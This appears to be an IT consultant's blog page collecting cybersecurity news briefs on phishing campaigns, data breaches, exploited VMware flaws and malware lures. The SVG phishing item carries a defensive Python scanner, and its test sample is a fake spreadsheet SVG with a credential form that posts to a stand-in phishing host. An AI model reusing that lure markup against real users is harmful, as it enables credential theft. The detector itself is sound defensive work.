Steve Thomas - IT Consultant


  • Fraudsters are impersonating US Government agencies
  • Victims are encouraged to renew fake contracts using DocuSign
  • Attacks have spiked almost 100% in the last month

Cybersecurity researchers have found threat actors are increasingly using DocuSign impersonations to target businesses who interact with state and municipal agencies.

Research by SlashNext found attacks have spiked 98% compared to the previous two months, with hundreds of instances being detected daily and tactics outpacing detection methods. Many of these specifically impersonate government entities to exploit the pre-existing trusted relationships between businesses and regulatory bodies.

Researchers found impersonations of the Department of Health and Human Services, the Maryland Department of Transportation, the State of North Carolina’s Electronic Vendor portal, the City of Milwaukee, the City of Charlotte, the City of Houston, and the North Carolina Licensing Board for General Contractors.

High stakes signatures

As with most scams, the criminals created a false sense of urgency in victims. In one instance, a North Carolina commercial contractor received a notice that their $12 million hospital construction project was at risk of immediate shutdown due to a compliance issue. The notice demanded an $85,000 ‘emergency compliance bond’ to prevent work stoppage.

As well as the financial loss, vendors face business disruption and sensitive data loss from the false contracts.

Businesses that hold a number of government contracts may be inundated with communications and contracts, but it’s important to stay vigilant and double check emails: inaccurate pricing or misused industry-specific terminology is an indicator that a message is not authentic.

“For businesses, the most important approach to defend against these fraudulent attacks is to spread awareness within the organization, to upskill and empower all workers to identify attacks at the earliest possible stage,” said Matt Aldridge, Principal Solutions Consultant at OpenText Cybersecurity.

“Beyond this, it is critical that inbound communications are thoroughly screened before being presented to users, be they emails, SMS, or even old school postal and fax communications.”

  • A VMware bug that grants Remote Code Execution abilities is being exploited in the wild
  • The bug was first spotted in September 2024, but the patch did not solve the problem
  • A second patch was released, and users are urged to apply now

Broadcom is warning two vulnerabilities plaguing its VMware vCenter Server product are being exploited in the wild by hackers.

Patches are available, and users are urged to apply them immediately, since there is no workaround. Furthermore, the vulnerabilities can be used to cause significant damage to compromised networks.

In mid-September 2024, VMware released a security advisory, claiming to have patched two flaws in vCenter Server that could have granted threat actors remote code execution (RCE) abilities.

Confirmed exploitation

These flaws were tracked as CVE-2024-38812 and CVE-2024-38813.

The former affects vCenter 7.0.3, 8.9.2, and 8.0.3, as well as all versions of vSphere or VMware Cloud Foundation prior to the ones listed above. It was given a severity score of 9.8 (critical) since it can be exploited without user interaction, and since it grants RCE capabilities to a threat actor sending a custom-built network packet. The latter, on the other hand, is a 7.5-severity flaw, granting root privilege escalation.

Both vulnerabilities were first discovered by Team TZL at Tsinghua University, during the Matrix Cup Cyber Security Competition, held in China earlier this year.

However, it soon became clear that the patches did not fully work, as Broadcom issued a second patch in late October 2024. At that time, despite the bug having been present for months and patched twice, there was still no evidence of abuse in the wild.

However, that time has now come.

"Updated advisory to note that VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813," Broadcom said earlier this week.

Unfortunately, at this time, we don’t know who is abusing these vulnerabilities, or against whom. However, BleepingComputer reminds us that threat actors, including ransomware gangs and state-sponsored groups, often target VMware vCenter bugs.

Via BleepingComputer

  • Emails from the US Library of Congress reportedly compromised
  • Attack was likely carried out by a foreign actor, experts claim
  • US Government institutions are increasingly under attack

Email correspondence to and from staff at the US Library of Congress’ Congressional Research Service has been compromised by a ‘foreign adversary’ in an elaborate hack, reports have claimed.

From January to September 2024, foreign actors were able to access emails between congressional legislative staff and researchers, according to NBC News.

It's not yet known exactly how many or which emails were accessed by the hackers, but Congress staff are concerned given the sensitive nature of communications between legislative staff and researchers.

Sensitive information

The Library of Congress is a research library that serves Congress and has research staff dedicated to it, responding to over 76,000 inquiries in 2023. The staff offer policy and legal analysis to congressional committees, making it an invaluable resource.

Because of the nature of the library’s work, it's likely that hackers had access to preliminary legislative proposals, or gained unauthorized access to staffers’ opinions and ideas. Reports have confirmed that the US Copyright Office was not impacted.

The attack is said to have been carried out by a ‘foreign adversary’, although it’s not yet clear which nation-state actor was behind the breach. Cyberattacks from the ‘Big Four’ (Iran, Russia, China, and the DPRK) have all increased dramatically in the run-up to the election, so investigators will likely be looking in these directions.

As of yet, the origin of the breach is unknown, but staff have been reminded of the phishing and email security guidance, suggesting this may have been the point of origin.

This isn’t the first time in recent months that Congressional staff have had their data compromised: in September 2024, it was revealed that almost 3,200 US politicians and staff had their data leaked to the dark web, meaning nearly 20% of people working in Congress were exposed.

  • Maxar notifies California Attorney General of data breach
  • It says sensitive employee data was stolen in the attack
  • The attacker used a Hong Kong address to breach the systems

Maxar Space Systems has reported suffering a data breach in which it lost sensitive employee data.

Confirming the breach in a filing with the California Attorney General, as well as in a breach notification letter sent to affected individuals, the company revealed an unidentified threat actor accessed its systems early in October 2024.

The hacker, who allegedly used a Hong Kong-based IP address for the intrusion, lurked for a week, exfiltrating sensitive data, before being spotted on October 11, and quickly ousted.

Hidden Risk

Before being expelled, the crooks managed to steal sensitive information on an as yet undisclosed number of Maxar employees, including people’s names, postal addresses, Social Security Numbers (SSN), business contact information (business phone, location, business email, and other data), gender, employment status, employee number, job title, hire date, role start date, and in some cases termination date, supervisor, and department information.

This is more than enough information to run all kinds of cyberattacks, from phishing, to identity theft, and possibly even ransomware and wire fraud. Luckily, bank account information and birth dates were not exposed.

Maxar said it notified the police, and offered both current and former employees a year’s worth of identity theft protection and credit monitoring via IDShield and IDX. “We strongly encourage you to report incidents of suspected identity theft to law enforcement,” the company added.

The affected company is a division of Maxar Technologies, specializing in the design, manufacturing, and integration of advanced satellite systems and space-based solutions for commercial and governmental applications.

It has roughly 2,600 employees, with more than half having US security clearances, meaning they can work on US government contracts.

Maxar Technologies, on the other hand, is a major space technology and intelligence company that provides geospatial data, satellite imagery, and advanced analytics to support industries such as defense, intelligence, and commercial sectors. This sector was not breached.

Via TechCrunch

  • A known hacker posts a new thread on an underground forum, offering Ford data for free
  • Ford responds by saying it is investigating the claims
  • There is no confirmation of data's authenticity yet

Ford says it is looking into a potential data breach after internal company information ended up on the dark web.

A known leaker with the alias EnergyWeaponUser recently posted a new thread on BreachForums, offering Ford’s data for free. “Today, I have uploaded the Ford Motor Company internal database for you to download, thanks for reading and enjoy!,” the post reads. EnergyWeaponUser added that the company was breached together with IntelBroker, another infamous leakster.

“In November 2024, Ford Motor Company, an American multinational automobile company suffered a data breach,” the post further adds. “It exposes 44k records of customer names, physical locations, bought product.”

"Actively investigating"

The crooks also shared a small sample of the stolen data, which appears to include customer names, postal addresses, country codes, customer type codes, city information, sales types, account codes, last update timestamps, and other records.

After the thread surfaced, The Register reached out to the company, which confirmed looking into the allegations of data theft.

"Ford is aware and is actively investigating the allegations that there has been a breach of Ford data," spokesperson Richard Binhammer told the publication. "Our investigation is active and ongoing."

EnergyWeaponUser and IntelBroker are quite active in the underground hacking community, often posting archives from breached corporations. They have previously been seen leaking Cisco information and sensitive data from AMD. IntelBroker was also seen leaking data from Europol, Nokia, and others.

Whether or not Ford’s data is authentic remains to be seen. Losing sensitive customer data can result in all kinds of headaches for a company, from regulatory fines to class action lawsuits. Most of the time, however, the biggest expense is paying for identity theft protection and credit monitoring services, which most companies provide to affected individuals for up to two years.

Via The Register

  • Security researchers spotted phishing emails with SVG attachments
  • The nature of SVG files allows them to bypass email protections
  • Common sense remains the best way to defend against phishing

Hackers are always looking for new ways to sneak phishing emails into people’s inboxes, and it seems SVG attachments are the next big thing.

Security researchers recently posted about SVG attachments on Twitter, claiming their nature allows them to bypass email protections and land malicious content in victims' inboxes.

For the uninitiated, SVG is short for Scalable Vector Graphics. It is a lossless image format used all across the web, especially for content designed to be viewed on screens of different sizes. Images are not made of pixels, but of XML-based markup that describes the graphics, and that markup can also carry scripts and embedded HTML. Because an SVG is code rather than a bitmap, antivirus programs that treat it as an ordinary image do not analyze it in the traditional sense of the word. As a result, many of these attachments bypass current protections.

Fake Excel

According to MalwareHunterTeam, some cybercriminals have found a way to abuse this fact. One of the examples was a fake Excel spreadsheet built as an SVG, which prompts people to submit content (mostly login credentials and other valuable information).
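As an added illustration of why inspecting the markup rather than the rendered picture matters (example code written for this page, not from the researchers cited above): a small Python triage script that parses an SVG attachment and flags the constructs a fake-spreadsheet lure relies on, namely scripts, embedded HTML forms, event handlers, javascript: URIs and external links. The sample SVGs, the hostname and the function names are all constructed for the demo.

```python
"""Triage an SVG attachment for active content instead of treating it as an opaque image."""
import re
import xml.etree.ElementTree as ET


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1].lower()


def scan_svg(data: bytes) -> list[str]:
    """Return human-readable findings; an empty list means no active content was seen."""
    findings: list[str] = []
    try:
        # expat (ElementTree's default parser) does not fetch external entities,
        # so parsing untrusted XML here does not trigger XXE-style fetches.
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"unparseable XML ({exc}); treat as suspicious"]

    for el in root.iter():
        tag = _local(el.tag)
        if tag == "script":
            findings.append("<script> element: SVG can run JavaScript when opened in a browser")
        elif tag == "foreignobject":
            findings.append("<foreignObject>: embeds arbitrary HTML (e.g. a login form) inside the image")
        elif tag in ("form", "input", "iframe"):
            findings.append(f"HTML <{tag}> nested in SVG: typical of a fake spreadsheet lure")

        for name, value in el.attrib.items():
            attr = _local(name)
            if attr.startswith("on"):  # onload, onclick, ... are inline script
                findings.append(f"event handler {attr}= on <{tag}>")
            if attr in ("href", "src", "action"):
                v = value.strip().lower()
                if v.startswith("javascript:"):
                    findings.append(f"javascript: URI in {attr} on <{tag}>")
                elif re.match(r"https?://", v):
                    findings.append(f"external link {value} in {attr} on <{tag}>")
    return findings


def is_suspicious(data: bytes) -> bool:
    """Simple verdict helper for a mail gateway: quarantine if anything was flagged."""
    return bool(scan_svg(data))


# Constructed samples: a benign icon and a lure imitating an Excel sheet with a sign-in form.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
<circle cx="5" cy="5" r="4" fill="green"/></svg>"""

LURE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
 width="600" height="400" onload="init()">
<rect width="600" height="400" fill="#fff"/>
<text x="20" y="30">Invoice_Q3.xlsx - sign in to view</text>
<foreignObject x="20" y="50" width="560" height="300">
 <form xmlns="http://www.w3.org/1999/xhtml" action="https://phish.example/login" method="post">
  <input name="email"/><input name="password" type="password"/>
 </form>
</foreignObject>
<a xlink:href="javascript:void(0)"><text x="20" y="380">Open</text></a>
<script>function init(){}</script>
</svg>"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("lure", LURE_SVG)):
        print(label, "->", scan_svg(sample) or "clean")
```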

Even if email security solutions providers find a way to defend against SVG-borne email attacks, crooks will only find another attack avenue.

Therefore, relying exclusively on software to protect your inbox against these threats is super risky. Instead, experts suggest humans be put in the proverbial trenches: using common sense, spotting phishing emails, and acting accordingly (reporting and deleting the email immediately) remains the best form of defense.

Another way crooks can bypass email protection in phishing attacks is through the use of QR codes.

Since these come in .JPG or similar image formats, they rarely get scanned for malice. Furthermore, QR codes in emails usually force victims to bring up their mobile devices, which are rarely as secure as desktop devices, increasing the chances of infection or data loss.

Via BleepingComputer

  • Malicious commits found in Exo Labs' GitHub account
  • They were submitted by accounts that pointed to a Texas-based security researcher
  • The malware does not exist, and the researcher claims someone is impersonating him

Someone has been breaking into GitHub projects, injecting malicious code, and seemingly trying to discredit a researcher by accusing them of the hack.

Executives from AI and machine learning startup Exo Labs have warned someone tried to submit new changes to the code in the company’s GitHub repository.

The added code was “innocent looking” and was titled “clarify mlx requirement for deepseek models”; to hide it from scrutiny, the attacker encoded the code as its numeric equivalent. However, the submission was analyzed before being pushed to the repository, and it was quickly discovered that it tried to connect to evildojo[dot]com to download a stage one payload. The researchers determined that there was no payload on the server and that it simply returned a 404 error.

Hidden Risk

Drilling deeper into the attack, the researchers discovered that the evildojo domain, as well as the GitHub accounts associated with the attack, all pointed to Mike Bell, a security researcher and white-hat hacker from Texas. He denies any involvement with the attack and claims it was all an attempt to ruin his good name.

"Not me, an impersonator. Notice account deleted. Very sorry people are being dragged into some skid's beef w/ me," BleepingComputer cited Bell saying about the attacks. “There was never any payload...why do people keep assuming there was?,” he added.

When questioned about the incident on X, Bell clarified that whoever was behind the attack never got access to his domain, never got the payload on his site, and that all Bell did was “piss someone off, apparently.”

Given that anyone can create a GitHub account impersonating someone else, and since there was no malicious payload or harm caused, the idea of a smear campaign seems plausible, especially since Bell is actively involved in the cybersecurity community, albeit from the opposing side.

Via BleepingComputer

  • Jen Easterly will vacate her post as Director of CISA before Trump comes into office
  • The future of CISA is uncertain under Trump, who has criticized the department in the past
  • There's no news yet on Easterly's successor

The Director of the Cybersecurity and Infrastructure Security Agency (CISA), Jen Easterly, is set to vacate her post before President Trump returns to office on January 20 2025, throwing the future of the agency into doubt.

CISA is responsible for critical infrastructure protection and improving the US government’s protections against cybercriminals and state actors, who are increasingly targeting American agencies in order to exfiltrate data and disrupt services.

Easterly held a number of security positions before taking the post as Director of CISA, such as senior director for counterterrorism on the National Security Council and Global Head of Cybersecurity for Morgan Stanley. Her departure leaves the fate of the agency uncertain.

Slash and burn

Given the number of eyebrow-raising cabinet appointees proposed by the President-elect, it's difficult to predict who might fill the position in 2025 and beyond.

CISA was created during Trump’s first term, but his consistent commitment to deregulation could limit the agency’s ability to enforce compliance with cybersecurity standards.

Following the narrow Senate election win for the Republican party, Senator Rand Paul is set to take over as chair of the Senate Homeland Security and Governmental Affairs Committee, which oversees CISA. Paul, a staunch libertarian and critic of CISA, previously accused the agency of infringing on free speech as part of its effort to counter digital disinformation.

Trump is likely to boost military spending in his second term, but most other agencies face seriously slashed budgets in the coming years. Although under the defense umbrella, cybersecurity will likely be amongst those to lose out on funding.

Governments across the globe are facing a dramatic surge in cyberattacks, with government organizations seeing a 236% increase in malware attacks, so cybersecurity will be a key consideration for the foreseeable future.

Via NextGov

  • Security researchers discover ad campaign for a piece of fake software
  • Software was advertised as an AI-powered photo and video editor
  • In reality, it was distributing the AMOS and Lumma Stealer malware

Hackers are hiding infostealers and other malware behind fake AI-powered photo and video editors, experts have claimed.

A cybersecurity researcher using the alias g0njxa found a social media advertising campaign promoting the malware. It posed as a fake editor called EditPro and was propped up by an accompanying website, editproai[dot]pro.

The attackers also created deepfake videos of Presidents Trump and Biden enjoying ice cream together, and used them in ads posted on social media sites such as X. The fake editors were built for both Windows and macOS, and anyone who falls for the trick and downloads the program will end up installing either Lumma Stealer or AMOS.

Lumma and AMOS

Lumma Stealer is a malware-as-a-service (MaaS) tool designed to steal sensitive information, including login credentials, cookies, browsing history, credit card data, and cryptocurrency wallet details.

The malware employs sophisticated techniques like process injection and encrypted communications with command-and-control servers, making it challenging to detect and mitigate. It has been active since 2022, with frequent updates enhancing its evasion and data theft strategies.

AMOS, short for Attack Management and Operations System, is a platform that enables threat actors to manage malware campaigns with minimal technical skills. It acts as a command-and-control (C2) system, and provides tools for deploying malware, managing infected systems, and exfiltrating stolen data.

It is typically used to coordinate large-scale attacks, automating many aspects of the cybercriminal workflow.

If you downloaded the fake EditPro software, assume that all of your passwords and any sensitive information stored on the device are compromised. First remove any traces of the malware from the computer, then update all passwords and other sensitive data. Enable 2FA wherever possible, and move your cryptocurrency and NFTs to a new wallet with a new seed phrase.

Via BleepingComputer

  • 2021 Twitch breach exposed sensitive data on thousands of users
  • An investigation by the Turkish data protection watchdog concluded the company was to blame
  • Twitch has to pay $58,000

Türkiye has fined Amazon $58,000 for the Twitch data breach in 2021 which affected thousands of Turkish nationals.

An anonymous hacker leaked the entirety of the popular video game live streaming service Twitch, including its source code and personally identifiable information (PII) of its users. The leaked data was rolled into a 125 GB torrent, and its link was posted to the popular 4chan imageboard.

Since the breach was said to have affected Turkish citizens, the country’s Personal Data Protection Board (KVKK) opened up an investigation soon after the attack. In total, 35,274 Turkish nationals were affected, so KVKK imposed a 1.75 million lira fine for inadequate security and 250,000 lira for failing to report the breach.

Insufficient security measures

The results of the investigation showed that the company, which was acquired by Amazon back in 2014 for $970 million in cash, “failed to take adequate security measures beforehand, addressing the issue only afterward.” What’s more, KVKK concluded that the company’s risk and threat assessments were “insufficient.”

At press time, Twitch was not commenting on the incident. At the time of the breach, however, it downplayed its importance, saying the attackers didn’t get their hands on users' login credentials and suggesting the threat was somewhat limited.

“Twitch passwords have not been exposed. We are also confident that systems that store Twitch login credentials, which are hashed with bcrypt, were not accessed, nor were full credit card numbers or ACH / bank information,” Twitch said.

At the time, it was reported that the hacker wasn’t pleased with the community that had built up around the service, and leaked the data in a bid to “foster more disruption and competition in the online video streaming space.”

Soon afterward, Twitch confirmed the breach, saying its team was “working with urgency” to understand the extent of the incident.

Via Reuters

  • AnnieMac says more than 170,000 people have had names and SSNs exposed
  • New filing with the Maine Attorney General covers Summer 2023 hack
  • The identity and motive of the attackers are unknown at this time

AnnieMac Home Mortgage has revealed suffering a data breach in which the sensitive data on hundreds of thousands of customers was exposed.

The mortgage company confirmed the information in a filing with the Maine Office of the Attorney General, saying it spotted “suspicious activity on certain systems” within its network on August 23, 2023.

Subsequent investigation determined that an unnamed attacker accessed the company’s IT infrastructure on August 21, and “viewed and/or copied certain files” from these systems.

No one claimed responsibility yet

These “certain files” held people’s full names and Social Security Numbers (SSN). A total of 171,074 individuals were affected by the incident.

This, arguably, isn’t that disruptive of a breach. Cybercriminals prefer databases with email addresses, postal addresses, and phone numbers, since they can use that information to impersonate other people, engage in spam and phishing, and more. There are not many things they can do with just names and SSNs.

To tackle the incident, AnnieMac did what most victim organizations do these days: it employed a third-party forensics company, notified the police, mailed the affected people, and offered a year’s worth of identity theft protection and credit monitoring via CyEx.

It also apologized, saying the “confidentiality, privacy, and security of personal information within our care are among AnnieMac’s highest priorities.”

We don’t know who stole the files. So far, no one has claimed responsibility for the attack, and the files are yet to pop up anywhere on the dark web.

AnnieMac Home Mortgage is a full-service mortgage lender that provides a wide range of home financing solutions, such as conventional loans, FHA loans, VA loans, USDA loans, and jumbo loans. With hundreds of thousands of customers, the company generates an estimated annual revenue of approximately $240 million.

Via The Register

  • Swiss citizens warned about fake ‘Alertswiss app’
  • Malicious app deploys a variant of the Coper trojan
  • Keystrokes, 2FA codes and credentials are at risk

The Swiss National Cyber Security Centre (NCSC) is warning the public about a recent malware campaign targeting citizens via the country’s postal service.

Residents are reportedly receiving letters through the post from what they believe to be the Federal Office of Meteorology and Climatology, urging them to install a fraudulent weather app.

The letters include a QR code to facilitate the download of the Android-based ‘Severe Weather Warning App,’ which masquerades as the nation’s Alertswiss app.

Swiss citizens targeted by QR code malware

Using QR codes to spread malware isn’t new, but the attack vectors can vary widely. When accessing online content, users should always be cautious of telltale signs that suggest the content they’re accessing is not legitimate.

In this case, the malicious app is labelled ‘AlertSwiss,’ whereas the genuine app is labelled ‘Alertswiss.’ It also has a slightly different icon. Furthermore, the app is distributed via a third-party website, rather than Google’s own Play Store, which is another key red flag.

Upon installation, the app deploys a Coper trojan variant that logs keystrokes, intercepts two-factor authentication messages, and steals banking credentials by targeting apps installed on the victim’s device. According to the public warning, it targets more than 383 smartphone apps.

The app also communicates with command-and-control servers, and can present phishing screens to obtain sensitive information from the victims.

The NCSC said that this was the first time that malware had been delivered through physical mail in the country: “The letters look official with the correct logo of the Federal Office for Meteorology and thus trustworthy.”

Citizens targeted by the letter are being urged to report it to the NCSC. Those who have already downloaded the app should reset their phones to factory settings.

Via The Register
